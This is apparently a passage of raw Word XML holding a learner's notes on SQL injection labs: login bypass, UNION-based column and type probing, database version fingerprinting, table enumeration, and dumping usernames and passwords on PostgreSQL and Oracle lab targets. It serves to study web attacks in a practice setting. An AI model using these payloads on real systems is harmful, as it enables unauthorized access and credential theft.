      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BB5BDA" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BF7D7B" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223DB5DF" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3476EBDA" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">Lab-02 : </w:t>
      </w:r>
      <w:r w:rsidRPr="003B036A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subverting application logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5142DABE" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">SQL Injection - Login Functionality </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCE8EFB" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>End Goal - Perform SQLi attack and log in as the administrator user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4FF27F" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7516DEA1" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0967C74B" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D554503" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>SELECT firstname FROM users where username='admin' and password='admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4569D7" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>SELECT firstname FROM users where username=''' and password='admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA50B9" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>SELECT firstname FROM users where username='admin'--' and password='admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF7872D" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">SELECT firstname FROM users where username='admin'  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C098523" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44458DF8" w14:textId="22B239B0" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68AD2F7C" wp14:editId="6937F4AB">
            <wp:extent cx="7560310" cy="6811010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1298227209" name="Picture 14" descr="&#10;&#10;Retrieving data from other database tables&#10;In cases where the application responds with the results of a SQL query, an attacker can use a SQL injection vulnerability to retrieve data from other tables within the database. You can use the UNION keyword to execute an additional SELECT query and append the results to the original query. &#10;For example, if an application executes the following query containing the user input Gifts: &#10;SELECT name, description FROM products WHERE category = 'Gifts'&#10;An attacker can submit the input: &#10;This causes the application to return all usernames and passwords along with the names and descriptions of products. &#10;&#10;Once appl respond based on SQL query then attacker can use SQLi vul to get data from other tables within DB, we can use UNION keyword to get addition Select query and append the result on original query.&#10;&#10;Eg: &#10;SELECT name, description FROM products WHERE category = 'Gifts' ' UNION SELECT username, password FROM users--&#10;==========================Original Query===============       ===========Additonal Union query============&#10;&#10;&#10;SQL injection UNION attacks&#10;&#10;Lab #3 SQLi UNION attack determining the no. of columns SQLi - Product category filter&#10;&#10;End Goal : Determine the no. of Column return by the query , &#10;Lab: SQL injection UNION attack, determining the number of columns returned by the query&#10;&#10;&#10;&#10;Backgroung (Union):&#10;&#10;Table1                                                 &#10;A&#10;B&#10;1&#10;2&#10;3&#10;4&#10;&#10;&#10;&#10; Table2&#10;C&#10;D&#10;2&#10;3&#10;4&#10;5&#10;&#10;Query #1: select a, b form table&#10;1,2&#10;3,4&#10;&#10;Query #2: Select a, b from table1 UNION select c, d from table2&#10;1,2&#10;3,4&#10;2,3&#10;4,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0;&#10;Retrieving data from other database tables&#10;In cases where the application responds with the results of a SQL query, an attacker can use a SQL injection vulnerability to retrieve data from other tables within the database. You can use the UNION keyword to execute an additional SELECT query and append the results to the original query. &#10;For example, if an application executes the following query containing the user input Gifts: &#10;SELECT name, description FROM products WHERE category = 'Gifts'&#10;An attacker can submit the input: &#10;This causes the application to return all usernames and passwords along with the names and descriptions of products. &#10;&#10;Once appl respond based on SQL query then attacker can use SQLi vul to get data from other tables within DB, we can use UNION keyword to get addition Select query and append the result on original query.&#10;&#10;Eg: &#10;SELECT name, description FROM products WHERE category = 'Gifts' ' UNION SELECT username, password FROM users--&#10;==========================Original Query===============       ===========Additonal Union query============&#10;&#10;&#10;SQL injection UNION attacks&#10;&#10;Lab #3 SQLi UNION attack determining the no. of columns SQLi - Product category filter&#10;&#10;End Goal : Determine the no. of Column return by the query , &#10;Lab: SQL injection UNION attack, determining the number of columns returned by the query&#10;&#10;&#10;&#10;Backgroung (Union):&#10;&#10;Table1                                                 &#10;A&#10;B&#10;1&#10;2&#10;3&#10;4&#10;&#10;&#10;&#10; Table2&#10;C&#10;D&#10;2&#10;3&#10;4&#10;5&#10;&#10;Query #1: select a, b form table&#10;1,2&#10;3,4&#10;&#10;Query #2: Select a, b from table1 UNION select c, d from table2&#10;1,2&#10;3,4&#10;2,3&#10;4,5&#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60310" cy="6811010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003B036A">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003B036A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="570397E0" wp14:editId="3C33858D">
            <wp:extent cx="7560310" cy="6811010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="427089296" name="Picture 13" descr="4,5&#10;&#10;&#10;Select a, b from table1 UNION select c, d from table2&#10;&#10;Rule:&#10;The no. and the order of the column must be the same in all queries&#10;The data types must be compatible&#10;&#10;We can used for to Detect no. of Column :&#10;NULL&#10;-&gt; ' UNION select NULL   ---&gt; Error &#10;-&gt;' UNION select NULL,NULL   ---&gt; NO Error means two columns&#10;Order by&#10;-&gt; 'order by 1    ---&gt; Error &#10;-&gt;  'order by 1      ---&gt; NO Error means two columns&#10;&#10;After getting the no. Column then try find data types of Column&#10;&#10;Select a, b, c from table1 UNION select 'a', NULL, NULL&#10;-&gt; Error -&gt; Column is not type text&#10;-&gt; no error -&gt; column is of type&#10;&#10;&#10;Step #1: Determine # of columns&#10;&#10;SQLi attack:&#10;&#10;Select ? From table UNION select NULL   &#10;--&gt; error -&gt; Incorect no. of columns&#10;&#10;Select ? From table UNION select NULL, NULL   &#10;--&gt; error -&gt; Incorect no. of columns&#10;&#10;Select ? From table UNION select NULL , NULL, NULL&#10;--&gt; 200 response code -&gt; Correct no. of columns&#10;&#10;SQLi  attack (way #2):&#10;Select a, b from table1 order by 3&#10;&#10;&#10;Step#2: Determine the data type of the columns &#10;&#10;Select a, b, c from table1 UNION select 'a', NULL, NULL&#10;-&gt; Error -&gt; Column is not type text&#10;-&gt; no error -&gt; column is of type&#10;==================================================&#10;&#10;Finding columns with a useful data type&#10;&#10;&#10;Lab #4: SQL injection UNION attack, finding a column containing text&#10;Same as above&#10;&#10;Using a SQL injection UNION attack to retrieve interesting dat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4,5&#10;&#10;&#10;Select a, b from table1 UNION select c, d from table2&#10;&#10;Rule:&#10;The no. and the order of the column must be the same in all queries&#10;The data types must be compatible&#10;&#10;We can used for to Detect no. of Column :&#10;NULL&#10;-&gt; ' UNION select NULL   ---&gt; Error &#10;-&gt;' UNION select NULL,NULL   ---&gt; NO Error means two columns&#10;Order by&#10;-&gt; 'order by 1    ---&gt; Error &#10;-&gt;  'order by 1      ---&gt; NO Error means two columns&#10;&#10;After getting the no. Column then try find data types of Column&#10;&#10;Select a, b, c from table1 UNION select 'a', NULL, NULL&#10;-&gt; Error -&gt; Column is not type text&#10;-&gt; no error -&gt; column is of type&#10;&#10;&#10;Step #1: Determine # of columns&#10;&#10;SQLi attack:&#10;&#10;Select ? From table UNION select NULL   &#10;--&gt; error -&gt; Incorect no. of columns&#10;&#10;Select ? From table UNION select NULL, NULL   &#10;--&gt; error -&gt; Incorect no. of columns&#10;&#10;Select ? From table UNION select NULL , NULL, NULL&#10;--&gt; 200 response code -&gt; Correct no. of columns&#10;&#10;SQLi  attack (way #2):&#10;Select a, b from table1 order by 3&#10;&#10;&#10;Step#2: Determine the data type of the columns &#10;&#10;Select a, b, c from table1 UNION select 'a', NULL, NULL&#10;-&gt; Error -&gt; Column is not type text&#10;-&gt; no error -&gt; column is of type&#10;==================================================&#10;&#10;Finding columns with a useful data type&#10;&#10;&#10;Lab #4: SQL injection UNION attack, finding a column containing text&#10;Same as above&#10;&#10;Using a SQL injection UNION attack to retrieve interesting data&#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60310" cy="6811010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003B036A">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003B036A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FE65D38" wp14:editId="2ACE73C7">
            <wp:extent cx="7560310" cy="6811010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1902544900" name="Picture 12" descr="Using a SQL injection UNION attack to retrieve interesting data&#10;&#10;&#10;Lab #5: SQL injection UNION attack, retrieving data from other tables&#10;SQL Injection - Product category filter&#10;&#10;EnD Goal : Output the username and passwords in the users table and login as the administrator user&#10;&#10;Analysis:&#10;&#10;Determine # of columns that the vulnerable query is using &#10;' order by  1--  &gt;&gt; no error&#10;' order by 2 --  &gt;&gt; no error&#10;'order by  3-- &gt;&gt; Error&#10;That means these contains 3-1   =2 columns&#10;&#10;&#10;Determine the data type of the columns  &gt;&gt; Need to add UNION&#10;Select a, b  form products where category='Gifts&#10;' UNION select 'a', NULL --   &gt;&gt; No Error&#10;' UNION select 'a', 'a'--    &gt;&gt; No error&#10;&#10;&lt;/td&gt;&#10;                        &lt;/tr&gt;&#10;                        &lt;tr&gt;&#10;                            &lt;th&gt;a&lt;/th&gt;&#10;                            &lt;td&gt;a&lt;/td&gt;&#10;&#10;&#10;&#10;-&gt; Both columns are of data type Steing&#10;&#10;'&#10;Output the version of the database &#10;' UNION SELECT @@version, Null--    -&gt; not Mocrosoft&#10;' UNION SELECT version(), Null--    -&gt; 200 ok&#10;PostgreSQL 11.11 (Debian 11.11-1 pgdg90+1)&#10;&#10;&#10;&#10;&#10;Output the list of tables names in the database&#10;' UNION SELECT table_name, NULL FROM information_schema.tables--&#10;Table name :  users&#10;&gt;&gt; '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--&#10;&#10;Output the column manes of the tablws &#10;' UNION SELECT FORM information_schema.columns WHERE table_name = 'users'--&#10;&gt;&gt; '+UNION+SELECT+column_name,+column_name+FROM+information_schema.columns+WHERE+table_name='users'--&#10;password&#10;username&#10;&#10;&gt;&gt; '+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--&#10;&#10;Output the username and passwords&#10;' UNION select username, password from user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sing a SQL injection UNION attack to retrieve interesting data&#10;&#10;&#10;Lab #5: SQL injection UNION attack, retrieving data from other tables&#10;SQL Injection - Product category filter&#10;&#10;EnD Goal : Output the username and passwords in the users table and login as the administrator user&#10;&#10;Analysis:&#10;&#10;Determine # of columns that the vulnerable query is using &#10;' order by  1--  &gt;&gt; no error&#10;' order by 2 --  &gt;&gt; no error&#10;'order by  3-- &gt;&gt; Error&#10;That means these contains 3-1   =2 columns&#10;&#10;&#10;Determine the data type of the columns  &gt;&gt; Need to add UNION&#10;Select a, b  form products where category='Gifts&#10;' UNION select 'a', NULL --   &gt;&gt; No Error&#10;' UNION select 'a', 'a'--    &gt;&gt; No error&#10;&#10;&lt;/td&gt;&#10;                        &lt;/tr&gt;&#10;                        &lt;tr&gt;&#10;                            &lt;th&gt;a&lt;/th&gt;&#10;                            &lt;td&gt;a&lt;/td&gt;&#10;&#10;&#10;&#10;-&gt; Both columns are of data type Steing&#10;&#10;'&#10;Output the version of the database &#10;' UNION SELECT @@version, Null--    -&gt; not Mocrosoft&#10;' UNION SELECT version(), Null--    -&gt; 200 ok&#10;PostgreSQL 11.11 (Debian 11.11-1 pgdg90+1)&#10;&#10;&#10;&#10;&#10;Output the list of tables names in the database&#10;' UNION SELECT table_name, NULL FROM information_schema.tables--&#10;Table name :  users&#10;&gt;&gt; '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--&#10;&#10;Output the column manes of the tablws &#10;' UNION SELECT FORM information_schema.columns WHERE table_name = 'users'--&#10;&gt;&gt; '+UNION+SELECT+column_name,+column_name+FROM+information_schema.columns+WHERE+table_name='users'--&#10;password&#10;username&#10;&#10;&gt;&gt; '+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--&#10;&#10;Output the username and passwords&#10;' UNION select username, password from users--&#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60310" cy="6811010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003B036A">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003B036A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0392F5F4" wp14:editId="4BCB23EC">
            <wp:extent cx="7560310" cy="6811010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="928719085" name="Picture 11" descr="' UNION select username, password from users--&#10;&#10;&#10;                       &lt;tr&gt;&#10;                            &lt;th&gt;administrator&lt;/th&gt;&#10;                            &lt;td&gt;984kv5ibrn6jfhv58rys&lt;/td&gt;&#10;                        &lt;/tr&gt;&#10;&#10;&#10;===============================================================================&#10;Retrieving multiple values within a single column&#10;&#10;Lab #6: SQL injection UNION attack, retrieving multiple values in a single column&#10;&#10;SQL Injection _ Product  Category filter&#10;&#10;EnD Goal : Retrive all usernames and passwords and login as the administratot user&#10;&#10;Analysis:&#10;---------------&#10;&#10;Determine the SQL Injection entry point &#10;Generlly look for ? Mark and = sign in url&#10;So there is chance is there in sql injection, once we get that&#10;Simply put payload ' if we get the error means there is sql injection&#10;&#10;Determine the no. columns that the Vulnerable is using&#10;' order by 1--   -&gt; No Error&#10;' order by 2--   -&gt; No Error&#10;' order by 3--   -&gt;  Error&#10;&#10;3-1 = 2 no. columns&#10;&#10;Find which columns contains text&#10;' UNION SELECT 'a', NULL--     &gt;&gt; Error&#10;' UNION SELECT NULL, 'a'--     &gt;&gt; NO Error&#10;&#10;This means Second Column as String&#10;&#10;&#10;Output data from other tables &#10;' UNION select NULL, username from users--&#10;' UNION select NULL, password from users--&#10;&#10;' UNION select NULL, version()--&#10;-&gt; Postgres Verison details &#10;&#10;' UNION select NULL username || '*' || password from users--&#10;&#10;&#10;Examining the database in SQL injection attacks&#10;&#10;Lab-07&#10;SQL Injection querying the database type and version on Oracle&#10;&#10;SQL Injection - Product category filte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UNION select username, password from users--&#10;&#10;&#10;                       &lt;tr&gt;&#10;                            &lt;th&gt;administrator&lt;/th&gt;&#10;                            &lt;td&gt;984kv5ibrn6jfhv58rys&lt;/td&gt;&#10;                        &lt;/tr&gt;&#10;&#10;&#10;===============================================================================&#10;Retrieving multiple values within a single column&#10;&#10;Lab #6: SQL injection UNION attack, retrieving multiple values in a single column&#10;&#10;SQL Injection _ Product  Category filter&#10;&#10;EnD Goal : Retrive all usernames and passwords and login as the administratot user&#10;&#10;Analysis:&#10;---------------&#10;&#10;Determine the SQL Injection entry point &#10;Generlly look for ? Mark and = sign in url&#10;So there is chance is there in sql injection, once we get that&#10;Simply put payload ' if we get the error means there is sql injection&#10;&#10;Determine the no. columns that the Vulnerable is using&#10;' order by 1--   -&gt; No Error&#10;' order by 2--   -&gt; No Error&#10;' order by 3--   -&gt;  Error&#10;&#10;3-1 = 2 no. columns&#10;&#10;Find which columns contains text&#10;' UNION SELECT 'a', NULL--     &gt;&gt; Error&#10;' UNION SELECT NULL, 'a'--     &gt;&gt; NO Error&#10;&#10;This means Second Column as String&#10;&#10;&#10;Output data from other tables &#10;' UNION select NULL, username from users--&#10;' UNION select NULL, password from users--&#10;&#10;' UNION select NULL, version()--&#10;-&gt; Postgres Verison details &#10;&#10;' UNION select NULL username || '*' || password from users--&#10;&#10;&#10;Examining the database in SQL injection attacks&#10;&#10;Lab-07&#10;SQL Injection querying the database type and version on Oracle&#10;&#10;SQL Injection - Product category filter&#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60310" cy="6811010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003B036A">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003B036A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37F2457E" wp14:editId="11345614">
            <wp:extent cx="7560310" cy="6811010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="6786314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60310" cy="6811010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003B036A">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003B036A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6460C0EC" wp14:editId="3758C545">
            <wp:extent cx="7560310" cy="6811010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="338531840" name="Picture 9" descr="&#10;End Goal &#10; Determine the table that contains usernames and passwords &#10;Determine the relevant columns&#10;Output the content of the table&#10;Login as the administrator user&#10;Analysis &#10;&#10;Determine the number of columns &#10;' order by  3-- -&gt; internal server error&#10;3-1=2&#10;&#10;Determine the data types of the columns &#10;' UNION SELECT 'a', 'a'--       -&gt; database --&gt;  200 ok&#10;&gt;&gt;  '+UNION+SELECT+'abc','def'--&#10;&#10;&#10;Got 'a' and 'a' In responses&#10;&#10;Output the version of the database &#10;' UNION SELECT @@version, Null--    -&gt; not Mocrosoft&#10;' UNION SELECT version(), Null--    -&gt; 200 ok&#10;PostgreSQL 11.11 (Debian 11.11-1 pgdg90+1)&#10;&#10;&#10;&#10;&#10;Output the list of tables names in the database&#10;' UNION SELECT table_name, NULL FROM information_schema.tables--&#10;Table name :  User_xacgsm ,   users_dxcefa&#10;&gt;&gt; '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--&#10;&#10;Output the column manes of the tablws &#10;'UNION SELECT FORM information_schema.columns WHERE table_name = 'user_xacgsm'&#10;&gt;&gt; '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--&#10;username_daytwr&#10;password_kcdqkd&#10;&#10;&gt;&gt; '+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--&#10;&#10;Output the username and passwords&#10;' UNION select username_daytwr, password_kcdqkd from users_dxcefa--&#10;&#10;Administrator&#10;sdseaui46p5muv85c481&#10;&#10;==============================================================&#10;&#10;Lab #10 - SQL injection attack, listing the database contents on Oracle &#10;&#10;End Goals:&#10;Determine which table contains the usernames and passwords &#10;Output the content of the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10;End Goal &#10; Determine the table that contains usernames and passwords &#10;Determine the relevant columns&#10;Output the content of the table&#10;Login as the administrator user&#10;Analysis &#10;&#10;Determine the number of columns &#10;' order by  3-- -&gt; internal server error&#10;3-1=2&#10;&#10;Determine the data types of the columns &#10;' UNION SELECT 'a', 'a'--       -&gt; database --&gt;  200 ok&#10;&gt;&gt;  '+UNION+SELECT+'abc','def'--&#10;&#10;&#10;Got 'a' and 'a' In responses&#10;&#10;Output the version of the database &#10;' UNION SELECT @@version, Null--    -&gt; not Mocrosoft&#10;' UNION SELECT version(), Null--    -&gt; 200 ok&#10;PostgreSQL 11.11 (Debian 11.11-1 pgdg90+1)&#10;&#10;&#10;&#10;&#10;Output the list of tables names in the database&#10;' UNION SELECT table_name, NULL FROM information_schema.tables--&#10;Table name :  User_xacgsm ,   users_dxcefa&#10;&gt;&gt; '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--&#10;&#10;Output the column manes of the tablws &#10;'UNION SELECT FORM information_schema.columns WHERE table_name = 'user_xacgsm'&#10;&gt;&gt; '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--&#10;username_daytwr&#10;password_kcdqkd&#10;&#10;&gt;&gt; '+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--&#10;&#10;Output the username and passwords&#10;' UNION select username_daytwr, password_kcdqkd from users_dxcefa--&#10;&#10;Administrator&#10;sdseaui46p5muv85c481&#10;&#10;==============================================================&#10;&#10;Lab #10 - SQL injection attack, listing the database contents on Oracle &#10;&#10;End Goals:&#10;Determine which table contains the usernames and passwords &#10;Output the content of the table&#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60310" cy="6811010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003B036A">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003B036A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ED608E1" wp14:editId="0476A661">
            <wp:extent cx="7560310" cy="3728085"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="714083571" name="Picture 8" descr="Output the content of the table&#10;Login as the administrator user&#10;&#10;&#10;Analysis&#10;Determine the number of columns &#10;' order by 3--   -&gt; Internal server erroe&#10;&#10;3-1 =2&#10;&#10;Find data type of columns&#10;' UNION select 'a', 'a' from DUAL--&#10;-&gt; Oracle database&#10;-&gt; bothcolumns accept type text &#10;&#10;Output the list of tables in the database &#10;' UNION SELECT table_name, NULL  FROM all_tables--&#10;&gt;&gt; USERS_HAYINC&#10;&#10;Output the column names&#10;' UNION SELECT column_name, NULL FROM all_tab_columns where table_name  = 'USERS_HAYINC'--&#10;USERNAME_ADTRTH&#10;PASSWORD_AUFEKU&#10;&#10;Output the list of usernames/passwords&#10;' UNION select USERNAME_ADTRTH, PASSWORD_AUFEKU from  USERS_HAYINC--&#10;administrator&#10;656q0rb3j7w0tki6byrw&#1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utput the content of the table&#10;Login as the administrator user&#10;&#10;&#10;Analysis&#10;Determine the number of columns &#10;' order by 3--   -&gt; Internal server erroe&#10;&#10;3-1 =2&#10;&#10;Find data type of columns&#10;' UNION select 'a', 'a' from DUAL--&#10;-&gt; Oracle database&#10;-&gt; bothcolumns accept type text &#10;&#10;Output the list of tables in the database &#10;' UNION SELECT table_name, NULL  FROM all_tables--&#10;&gt;&gt; USERS_HAYINC&#10;&#10;Output the column names&#10;' UNION SELECT column_name, NULL FROM all_tab_columns where table_name  = 'USERS_HAYINC'--&#10;USERNAME_ADTRTH&#10;PASSWORD_AUFEKU&#10;&#10;Output the list of usernames/passwords&#10;' UNION select USERNAME_ADTRTH, PASSWORD_AUFEKU from  USERS_HAYINC--&#10;administrator&#10;656q0rb3j7w0tki6byrw&#10;&#10;&#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60310" cy="3728085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003B036A">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B643F7B" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE42A1A" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2FE7CF" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL injection in different contexts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDCCB2A" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506AD15D" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEEC516" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">In the previous labs, you used the query string to inject your malicious SQL payload. However, you can perform SQL injection attacks using any controllable input that is processed as a SQL query by the application. For example, some websites take input in JSON or XML format and use this to query the database. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0BB0D6" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">These different formats may provide different ways for you to </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:anchor="obfuscation-via-xml-encoding" w:history="1">
        <w:r w:rsidRPr="003B036A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>obfuscate attacks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003B036A">
